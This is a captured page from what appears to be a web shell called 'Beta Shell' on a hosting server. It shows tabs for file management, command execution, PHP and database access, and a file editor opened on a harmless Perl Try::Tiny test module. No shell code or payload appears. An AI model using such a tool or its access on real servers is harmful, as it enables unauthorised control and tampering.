Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
perl-Try-Tiny
/
t
/
lib
Upload
3 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
TryUser.pm
141 B
-rw-r--r--
2017-12-21 07:23:09
Edit
Del
Editing: TryUser.pm
(141 B)
Path: /usr/share/doc/perl-Try-Tiny/t/lib/TryUser.pm
Back
package TryUser; use Try::Tiny; sub test_try { try { } } sub test_catch { try { } catch { } } sub test_finally { try { } finally { } } 1;